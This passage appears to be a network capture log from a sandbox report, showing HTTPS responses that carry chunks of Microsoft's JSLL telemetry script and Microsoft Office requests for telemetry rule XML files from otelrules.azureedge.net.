                                                                                                                                                                        Cache-Control: no-transform, public, max-age=1800, immutable
                                                                                                                                                                        Last-Modified: Mon, 14 Oct 2024 17:27:31 GMT
                                                                                                                                                                        ETag: 0x8DCEC757C1AD1D1
                                                                                                                                                                        x-ms-request-id: 24663fe8-301e-00d3-0bb2-2cfca8000000
                                                                                                                                                                        x-ms-version: 2009-09-19
                                                                                                                                                                        x-ms-meta-jssdkver: 4.3.3
                                                                                                                                                                        x-ms-meta-jssdksrc: [cdn]/scripts/c/ms.jsll-4.3.3.min.js
                                                                                                                                                                        Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,x-ms-meta-jssdkver,x-ms-meta-jssdksrc,Content-Type,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                        x-azure-ref: 20241121T093806Z-r1d97b99577656nchC1TEBk98c0000000a8g000000004g47
                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                        X-Cache-Info: L2_T2
                                                                                                                                                                        X-Cache: TCP_REMOTE_HIT
                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                        2024-11-21 09:38:06 UTC15488INData Raw: 2f 2a 21 0a 20 2a 20 31 44 53 20 4a 53 4c 4c 20 53 4b 55 2c 20 34 2e 33 2e 33 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 63 29 20 4d 69 63 72 6f 73 6f 66 74 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 2e 20 41 6c 6c 20 72 69 67 68 74 73 20 72 65 73 65 72 76 65 64 2e 0a 20 2a 20 28 4d 69 63 72 6f 73 6f 66 74 20 49 6e 74 65 72 6e 61 6c 20 4f 6e 6c 79 29 0a 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 22 75 6e 64 65 66 69 6e 65 64 22 3b 69 66 28 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 26 26 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 21 3d 6e 29 74 28 65 78 70 6f 72 74 73 29 3b 65 6c 73 65 20 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69
                                                                                                                                                                        Data Ascii: /*! * 1DS JSLL SKU, 4.3.3 * Copyright (c) Microsoft and contributors. All rights reserved. * (Microsoft Internal Only) */!function(e,t){var n="undefined";if("object"==typeof exports&&typeof module!=n)t(exports);else if("function"==typeof define&&defi
                                                                                                                                                                        2024-11-21 09:38:06 UTC16384INData Raw: 22 2b 74 5d 29 3f 6e 28 69 29 3a 28 72 3d 66 65 28 22 63 6f 6e 73 6f 6c 65 22 29 29 26 26 28 72 2e 65 72 72 6f 72 7c 7c 72 2e 6c 6f 67 29 28 74 2c 63 65 28 69 29 29 29 29 7d 53 65 28 61 3d 7b 74 68 65 6e 3a 6f 2c 22 63 61 74 63 68 22 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 6f 28 75 6e 64 65 66 69 6e 65 64 2c 65 29 7d 2c 22 66 69 6e 61 6c 6c 79 22 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 3d 74 2c 6e 3d 74 3b 72 65 74 75 72 6e 20 51 28 74 29 26 26 28 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 74 26 26 74 28 29 2c 65 7d 2c 6e 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 74 68 72 6f 77 20 74 26 26 74 28 29 2c 65 7d 29 2c 6f 28 65 2c 6e 29 7d 7d 2c 22 73 74 61 74 65 22 2c 7b 67 65 74 3a 64 7d 29 2c 68 74 28 29 26
                                                                                                                                                                        Data Ascii: "+t])?n(i):(r=fe("console"))&&(r.error||r.log)(t,ce(i))))}Se(a={then:o,"catch":function(e){return o(undefined,e)},"finally":function(t){var e=t,n=t;return Q(t)&&(e=function(e){return t&&t(),e},n=function(e){throw t&&t(),e}),o(e,n)}},"state",{get:d}),ht()&
                                                                                                                                                                        2024-11-21 09:38:06 UTC16384INData Raw: 74 69 6f 6e 20 67 63 28 65 2c 74 2c 6e 2c 72 29 7b 67 65 28 65 2c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 26 26 65 5b 74 5d 26 26 28 6e 3f 28 6e 2e 63 62 5b 74 65 5d 28 7b 66 6e 3a 72 2c 61 72 67 3a 65 7d 29 2c 6e 2e 68 3d 6e 2e 68 7c 7c 6e 6e 28 70 63 2c 30 2c 6e 29 29 3a 4d 28 72 2c 5b 65 5d 29 29 7d 29 7d 68 63 2e 5f 5f 69 65 44 79 6e 3d 31 3b 76 61 72 20 76 63 3d 68 63 3b 66 75 6e 63 74 69 6f 6e 20 68 63 28 65 29 7b 74 68 69 73 2e 6c 69 73 74 65 6e 65 72 73 3d 5b 5d 3b 76 61 72 20 6e 2c 69 3d 5b 5d 2c 61 3d 7b 68 3a 6e 75 6c 6c 2c 63 62 3a 5b 5d 7d 2c 6f 3d 76 6f 28 65 2c 64 63 29 5b 4b 6e 5d 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 6e 3d 21 21 65 2e 63 66 67 2e 70 65 72 66 45 76 74 73 53 65 6e 64 41 6c 6c 7d 29 3b 76 65 28 68 63 2c 74 68 69 73 2c 66 75
                                                                                                                                                                        Data Ascii: tion gc(e,t,n,r){ge(e,function(e){e&&e[t]&&(n?(n.cb[te]({fn:r,arg:e}),n.h=n.h||nn(pc,0,n)):M(r,[e]))})}hc.__ieDyn=1;var vc=hc;function hc(e){this.listeners=[];var n,i=[],a={h:null,cb:[]},o=vo(e,dc)[Kn](function(e){n=!!e.cfg.perfEvtsSendAll});ve(hc,this,fu
                                                                                                                                                                        2024-11-21 09:38:06 UTC16384INData Raw: 29 2c 68 28 29 2c 6d 28 65 2c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 61 2e 66 6c 75 73 68 43 6f 6d 70 6c 65 74 65 3d 65 2c 50 3d 21 30 2c 52 2e 72 75 6e 28 6f 2c 61 29 2c 66 5b 67 72 5d 28 29 2c 6f 5b 6c 72 5d 28 61 29 7d 2c 36 2c 6e 29 2c 69 7d 2c 66 5b 6f 72 5d 3d 73 2c 66 2e 61 64 64 50 6c 75 67 69 6e 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 2c 72 29 7b 69 66 28 21 65 29 72 65 74 75 72 6e 20 72 26 26 72 28 21 31 29 2c 76 6f 69 64 20 43 28 6f 75 29 3b 76 61 72 20 69 3d 73 28 65 5b 24 6e 5d 29 3b 69 66 28 69 26 26 21 74 29 72 65 74 75 72 6e 20 72 26 26 72 28 21 31 29 2c 76 6f 69 64 20 43 28 22 50 6c 75 67 69 6e 20 5b 22 2b 65 5b 24 6e 5d 2b 22 5d 20 69 73 20 61 6c 72 65 61 64 79 20 6c 6f 61 64 65 64 21 22 29 3b 76 61 72 20 61 2c 6f 3d 7b 72 65 61 73 6f
                                                                                                                                                                        Data Ascii: ),h(),m(e,function(e){a.flushComplete=e,P=!0,R.run(o,a),f[gr](),o[lr](a)},6,n),i},f[or]=s,f.addPlugin=function(e,t,n,r){if(!e)return r&&r(!1),void C(ou);var i=s(e[$n]);if(i&&!t)return r&&r(!1),void C("Plugin ["+e[$n]+"] is already loaded!");var a,o={reaso
                                                                                                                                                                        2024-11-21 09:38:06 UTC16384INData Raw: 28 7b 4e 6f 72 6d 61 6c 3a 31 2c 43 72 69 74 69 63 61 6c 3a 32 7d 29 2c 75 6e 64 65 66 69 6e 65 64 2c 75 6e 64 65 66 69 6e 65 64 29 2c 53 6c 3d 22 22 3b 66 75 6e 63 74 69 6f 6e 20 78 6c 28 65 29 7b 74 72 79 7b 69 66 28 6f 65 28 6f 74 28 29 29 29 72 65 74 75 72 6e 20 6e 75 6c 6c 3b 76 61 72 20 74 3d 28 6e 65 77 20 44 61 74 65 29 5b 4f 73 5d 28 29 2c 6e 3d 66 65 28 65 3d 3d 3d 45 6c 2e 4c 6f 63 61 6c 53 74 6f 72 61 67 65 3f 22 6c 6f 63 61 6c 53 74 6f 72 61 67 65 22 3a 22 73 65 73 73 69 6f 6e 53 74 6f 72 61 67 65 22 29 2c 72 3d 53 6c 2b 74 2c 69 3d 28 6e 2e 73 65 74 49 74 65 6d 28 72 2c 74 29 2c 6e 2e 67 65 74 49 74 65 6d 28 72 29 21 3d 3d 74 29 3b 69 66 28 6e 5b 52 73 5d 28 72 29 2c 21 69 29 72 65 74 75 72 6e 20 6e 7d 63 61 74 63 68 28 61 29 7b 7d 72 65 74
                                                                                                                                                                        Data Ascii: ({Normal:1,Critical:2}),undefined,undefined),Sl="";function xl(e){try{if(oe(ot()))return null;var t=(new Date)[Os](),n=fe(e===El.LocalStorage?"localStorage":"sessionStorage"),r=Sl+t,i=(n.setItem(r,t),n.getItem(r)!==t);if(n[Rs](r),!i)return n}catch(a){}ret
                                                                                                                                                                        2024-11-21 09:38:06 UTC16384INData Raw: 28 6f 2c 22 41 75 74 6f 20 74 72 61 63 6b 20 70 61 67 65 20 76 69 73 69 74 20 74 69 6d 65 20 66 61 69 6c 65 64 2c 20 6d 65 74 72 69 63 20 77 69 6c 6c 20 6e 6f 74 20 62 65 20 63 6f 6c 6c 65 63 74 65 64 3a 20 22 2b 63 65 28 72 29 29 7d 7d 2c 59 28 65 2c 22 5f 6c 6f 67 67 65 72 22 2c 7b 67 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6f 7d 7d 29 2c 59 28 65 2c 22 70 61 67 65 56 69 73 69 74 54 69 6d 65 54 72 61 63 6b 69 6e 67 48 61 6e 64 6c 65 72 22 2c 7b 67 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 63 7d 7d 29 7d 29 7d 76 61 72 20 4e 64 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 74 68 69 73 5b 67 64 5d 3d 50 74 28 29 2c 74 68 69 73 2e 70 61 67 65 4e 61 6d 65 3d 65 2c 74 68 69 73 2e 70 61 67 65 55 72 6c 3d 74 7d 2c 44 64 3d 66 75
                                                                                                                                                                        Data Ascii: (o,"Auto track page visit time failed, metric will not be collected: "+ce(r))}},Y(e,"_logger",{g:function(){return o}}),Y(e,"pageVisitTimeTrackingHandler",{g:function(){return c}})})}var Nd=function(e,t){this[gd]=Pt(),this.pageName=e,this.pageUrl=t},Dd=fu
                                                                                                                                                                        2024-11-21 09:38:06 UTC16384INData Raw: 63 6f 6e 66 69 67 2e 63 6f 72 65 44 61 74 61 2c 22 62 65 68 61 76 69 6f 72 22 29 2c 75 65 28 6e 2e 70 61 67 65 54 79 70 65 29 26 26 28 65 2e 70 61 67 65 54 79 70 65 3d 6e 2e 70 61 67 65 54 79 70 65 29 2c 75 65 28 72 2e 5f 70 61 67 65 54 79 70 65 4d 65 74 61 54 61 67 29 26 26 21 75 65 28 65 2e 70 61 67 65 54 79 70 65 29 26 26 28 65 2e 70 61 67 65 54 79 70 65 3d 72 2e 5f 70 61 67 65 54 79 70 65 4d 65 74 61 54 61 67 29 2c 75 65 28 72 2e 5f 6d 61 72 6b 65 74 4d 65 74 61 54 61 67 29 26 26 28 65 2e 6d 61 72 6b 65 74 3d 72 2e 5f 6d 61 72 6b 65 74 4d 65 74 61 54 61 67 29 2c 65 2e 69 73 4c 6f 67 67 65 64 49 6e 3d 47 64 28 72 2e 5f 63 6f 6e 66 69 67 29 2c 74 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 3d 6f 63 28 29 7d 2c 69 70 2e 70 72 6f 74 6f 74 79 70 65 2e 5f 73
                                                                                                                                                                        Data Ascii: config.coreData,"behavior"),ue(n.pageType)&&(e.pageType=n.pageType),ue(r._pageTypeMetaTag)&&!ue(e.pageType)&&(e.pageType=r._pageTypeMetaTag),ue(r._marketMetaTag)&&(e.market=r._marketMetaTag),e.isLoggedIn=Gd(r._config),t.cookieEnabled=oc()},ip.prototype._s
                                                                                                                                                                        2024-11-21 09:38:06 UTC16384INData Raw: 65 29 72 65 74 75 72 6e 21 30 3b 72 65 74 75 72 6e 21 31 7d 2c 41 70 2e 70 72 6f 74 6f 74 79 70 65 2e 5f 69 73 54 72 61 63 6b 65 64 57 69 74 68 44 61 74 61 42 69 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 74 3d 65 2e 61 74 74 72 69 62 75 74 65 73 2c 6e 3d 30 3b 6e 3c 74 2e 6c 65 6e 67 74 68 3b 6e 2b 2b 29 69 66 28 7e 74 5b 6e 5d 2e 6e 61 6d 65 2e 69 6e 64 65 78 4f 66 28 22 64 61 74 61 2d 62 69 2d 22 29 29 72 65 74 75 72 6e 21 30 3b 72 65 74 75 72 6e 21 31 7d 2c 41 70 2e 70 72 6f 74 6f 74 79 70 65 2e 5f 69 73 54 72 61 63 6b 65 64 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 74 3d 65 2e 61 74 74 72 69 62 75 74 65 73 2c 6e 3d 30 3b 6e 3c 74 2e 6c 65 6e 67 74 68 3b 6e 2b 2b 29 69 66 28 22 64 61 74 61 2d 6d 22 3d 3d 3d 74
                                                                                                                                                                        Data Ascii: e)return!0;return!1},Ap.prototype._isTrackedWithDataBi=function(e){for(var t=e.attributes,n=0;n<t.length;n++)if(~t[n].name.indexOf("data-bi-"))return!0;return!1},Ap.prototype._isTracked=function(e){for(var t=e.attributes,n=0;n<t.length;n++)if("data-m"===t
                                                                                                                                                                        2024-11-21 09:38:06 UTC16384INData Raw: 67 3d 22 57 65 62 41 75 74 68 54 6f 6b 65 6e 22 2c 61 3d 22 41 75 74 68 58 54 6f 6b 65 6e 22 2c 67 67 3d 22 6d 73 66 70 63 22 2c 76 67 3d 22 75 73 65 72 22 2c 68 67 3d 22 61 6c 6c 6f 77 52 65 71 75 65 73 74 53 65 6e 64 69 6e 67 22 2c 6d 67 3d 22 66 69 72 73 74 52 65 71 75 65 73 74 53 65 6e 74 22 2c 79 67 3d 22 73 68 6f 75 6c 64 41 64 64 43 6c 6f 63 6b 53 6b 65 77 48 65 61 64 65 72 73 22 2c 43 67 3d 22 67 65 74 43 6c 6f 63 6b 53 6b 65 77 48 65 61 64 65 72 56 61 6c 75 65 22 2c 62 67 3d 22 73 65 74 43 6c 6f 63 6b 53 6b 65 77 22 2c 79 65 3d 22 6c 65 6e 67 74 68 22 2c 54 67 3d 22 63 6f 6e 63 61 74 22 2c 49 67 3d 22 69 4b 65 79 22 2c 45 67 3d 22 63 6f 75 6e 74 22 2c 5f 67 3d 22 65 76 65 6e 74 73 22 2c 53 67 3d 22 70 75 73 68 22 2c 78 67 3d 22 73 70 6c 69 74 22
                                                                                                                                                                        Data Ascii: g="WebAuthToken",a="AuthXToken",gg="msfpc",vg="user",hg="allowRequestSending",mg="firstRequestSent",yg="shouldAddClockSkewHeaders",Cg="getClockSkewHeaderValue",bg="setClockSkew",ye="length",Tg="concat",Ig="iKey",Eg="count",_g="events",Sg="push",xg="split"
                                                                                                                                                                        2024-11-21 09:38:06 UTC16384INData Raw: 61 28 65 5b 6d 76 5d 29 29 2c 65 5b 6c 76 5d 26 26 28 65 5b 6c 76 5d 3d 65 61 28 65 5b 6c 76 5d 29 29 29 7d 66 75 6e 63 74 69 6f 6e 20 61 28 65 2c 74 29 7b 69 66 28 65 5b 79 76 5d 7c 7c 28 65 5b 79 76 5d 3d 30 29 2c 65 5b 43 76 5d 7c 7c 28 65 5b 43 76 5d 3d 31 29 2c 6c 28 65 29 2c 65 5b 62 76 5d 29 69 66 28 55 7c 7c 61 65 29 65 5b 43 76 5d 3d 33 2c 65 5b 62 76 5d 3d 21 31 3b 65 6c 73 65 20 69 66 28 48 29 72 65 74 75 72 6e 20 57 26 26 28 65 3d 65 61 28 65 29 29 2c 48 5b 72 76 5d 28 45 76 2e 63 72 65 61 74 65 28 65 5b 49 67 5d 2c 5b 65 5d 29 2c 21 30 3d 3d 3d 65 5b 62 76 5d 3f 31 3a 65 5b 62 76 5d 2c 33 29 3b 76 61 72 20 6e 3d 65 5b 43 76 5d 2c 72 3d 63 65 2c 69 3d 52 2c 61 3d 28 34 3d 3d 3d 6e 26 26 28 72 3d 6f 65 2c 69 3d 4f 29 2c 21 31 29 3b 72 3c 69 3f
                                                                                                                                                                        Data Ascii: a(e[mv])),e[lv]&&(e[lv]=ea(e[lv])))}function a(e,t){if(e[yv]||(e[yv]=0),e[Cv]||(e[Cv]=1),l(e),e[bv])if(U||ae)e[Cv]=3,e[bv]=!1;else if(H)return W&&(e=ea(e)),H[rv](Ev.create(e[Ig],[e]),!0===e[bv]?1:e[bv],3);var n=e[Cv],r=ce,i=R,a=(4===n&&(r=oe,i=O),!1);r<i?


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                        125192.168.2.64985513.107.246.60443
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-11-21 09:38:05 UTC192OUTGET /rules/rule703901v0s19.xml HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                        2024-11-21 09:38:06 UTC515INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Thu, 21 Nov 2024 09:38:06 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 1427
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:53 GMT
                                                                                                                                                                        ETag: "0x8DC582BE56F6873"
                                                                                                                                                                        x-ms-request-id: 38a59648-401e-00ac-39a0-3b0a97000000
                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                        x-azure-ref: 20241121T093806Z-r1d97b9957789nh9hC1TEBxha80000000a8g000000009ft3
                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                        X-Cache-Info: L1_T2
                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                        2024-11-21 09:38:06 UTC1427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 39 30 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 72 76 69 63 65 61 62 69 6c 69 74 79 4d 61 6e 61 67 65 72 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75
                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703901" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ServiceabilityManager.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="Nexu


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                        126192.168.2.64985613.107.246.60443
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-11-21 09:38:06 UTC192OUTGET /rules/rule703900v0s19.xml HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                        2024-11-21 09:38:07 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Thu, 21 Nov 2024 09:38:07 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 1390
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:49 GMT
                                                                                                                                                                        ETag: "0x8DC582BE3002601"
                                                                                                                                                                        x-ms-request-id: c9275fb5-a01e-000d-708c-3ad1ea000000
                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                        x-azure-ref: 20241121T093807Z-1777c6cb754b7tdghC1TEBwwa40000000b20000000005y6x
                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                        2024-11-21 09:38:07 UTC1390INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 39 30 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 72 76 69 63 65 61 62 69 6c 69 74 79 4d 61 6e 61 67 65 72 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 65 72 76 69 63 65 61 62 69 6c 69 74 79 4d 61 6e 61 67 65 72 22 20 53 3d
                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703900" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ServiceabilityManager" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenServiceabilityManager" S=


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                        127192.168.2.64985713.107.246.60443
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-11-21 09:38:07 UTC192OUTGET /rules/rule701501v1s19.xml HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                        2024-11-21 09:38:07 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Thu, 21 Nov 2024 09:38:07 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 1401
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:48 GMT
                                                                                                                                                                        ETag: "0x8DC582BE2A9D541"
                                                                                                                                                                        x-ms-request-id: 2155ac17-401e-00a3-238c-3a8b09000000
                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                        x-azure-ref: 20241121T093807Z-1777c6cb754wcxkwhC1TEB3c6w0000000ax0000000002gzs
                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                        2024-11-21 09:38:07 UTC1401INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 35 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 63 75 72 69 74 79 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53
                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701501" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Security.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenS


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                        128192.168.2.64985813.107.246.60443
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-11-21 09:38:07 UTC192OUTGET /rules/rule701500v1s19.xml HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                        2024-11-21 09:38:07 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Thu, 21 Nov 2024 09:38:07 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 1364
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:28:03 GMT
                                                                                                                                                                        ETag: "0x8DC582BEB6AD293"
                                                                                                                                                                        x-ms-request-id: c7391ddf-401e-0064-3568-3b54af000000
                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                        x-azure-ref: 20241121T093807Z-178bfbc474bv7whqhC1NYC1fg40000000180000000009gs4
                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                        2024-11-21 09:38:07 UTC1364INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 35 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 63 75 72 69 74 79 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 65 63 75 72 69 74 79 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e
                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701500" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Security" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSecurity" S="Medium" /> <F T="2">


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                        129192.168.2.64985913.107.246.60443
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-11-21 09:38:07 UTC192OUTGET /rules/rule702801v1s19.xml HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
